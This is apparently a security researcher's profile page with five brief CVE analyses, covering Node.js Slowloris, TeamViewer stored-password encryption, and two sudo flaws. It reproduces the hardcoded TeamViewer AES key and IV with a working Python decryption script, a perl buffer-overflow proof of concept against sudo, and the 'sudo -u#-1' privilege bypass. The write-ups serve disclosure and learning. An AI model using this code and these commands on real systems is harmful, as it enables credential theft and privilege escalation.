SherlockSec (18)
Last Login: April 15, 2020
SherlockSec's Latest (5) Contributions
Technical Analysis
This is a Denial of Service CVE, but with a twist. Normally, denial of service attacks consist of flooding a server with enough traffic so that it ceases to operate. This CVE is different, as it is a Slowloris DoS. Slowloris DoS attacks hang a server by opening as many threads as possible before waiting the max amount of time that they can before sending data. When they finally send data, they send as small of an amount of data as the server will allow. This keeps all the threads open for as long as possible, meaning no new connections can be opened, thus causing a denial of service. For a more detailed explanation of a Slowloris attack, please see the following video: https://www.youtube.com/watch?v=XiFkyR35v2Y .
This particular CVE affects all versions of Node.JS prior to 6.15.0, 8.14.0, 10.14.0 and 11.3.0. Node patched this by applying a 40 second timeout to servers receiving HTTP headers, and can be customized. As a patch has been released, please patch accordingly.
Technical Analysis
In some versions of Teamviewer, user defined passwords are stored in the registery, encrypted with AES-128-CBC. This wouldn’t be an issue, if the key and IV for this AES encryption wasn’t stored inside the Teamviewer binary itself. This means that we now have these:
key: 0602000000a400005253413100040000 iv: 0100010067244F436E6762F25EA8D704
This can be used to get the stored password using either the following python script (source: https://whynotsecurity.com/blog/teamviewer/) or using the MSF Module.
import sys, hexdump, binascii from Crypto.Cipher import AES class AESCipher: def __init__(self, key): self.key = key def decrypt(self, iv, data): self.cipher = AES.new(self.key, AES.MODE_CBC, iv) return self.cipher.decrypt(data) key = binascii.unhexlify("0602000000a400005253413100040000") iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704") hex_str_cipher = "d690a9d0a592327f99bb4c6a6b6d4cbe" # output from the registry ciphertext = binascii.unhexlify(hex_str_cipher) raw_un = AESCipher(key).decrypt(iv, ciphertext) print(hexdump.hexdump(raw_un)) password = raw_un.decode('utf-16') print(password)
This CVE requires users to reuse passwords across multiple accounts, so it’s not guaranteed to escalate privilleges. This is also the reason why Teamviewer themselves state the following in their Security Bulletin:
In the blog post, the researcher mentions a privilege escalation risk. There’s no direct vulnerability offering someone the ability to gain additional privileges on the local system. The only risk would be in the case that a user is reusing the exposed passwords on other services.
Source – https://community.teamviewer.com/t5/Announcements/Specification-on-CVE-2019-18988/td-p/82264
Technical Analysis
This exploit is similar to CVE-2019-14287, in that it requires a specific config within /etc/sudoers
. Present in sudo versions < 1.8.26, this vuln surrounds the pwfeedback
option: an option that allows sudo to display asteriks when typing a sudo password. This module is susceptible to a buffer overflow attack, which was demonstrated in the following PoC:
$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id Password: Segmentation fault
Source – https://www.exploit-db.com/exploits/47995
An exploit for this vuln can be found here – https://github.com/saleemrashid/sudo-cve-2019-18634
A preconfigured test environment can be found here – https://tryhackme.com/room/sudovulnsbof
Technical Analysis
As many others before me have stated, this CVE hold very little use other than in CTF environments.
To spot this vuln, look for a configuration similar to this one in the /etc/sudoers
file:
<user> ALL=(ALL:!root) NOPASSWD: ALL
If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:
sudo -u#-1 <command>
You can also use the unsigned equivalent of -1: 4294967295
.
To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .
Technical Analysis
There’s not a lot of information about this CVE, however the notice does give us some insight. This appears to me to be a simple Man-In-The-Middle attack: one that you’d be incredibly lucky to have a use for in the wild. As such, useability for this CVE is low. If kmore information comes forward regarding this CVE, I shall update my assessment accordingly.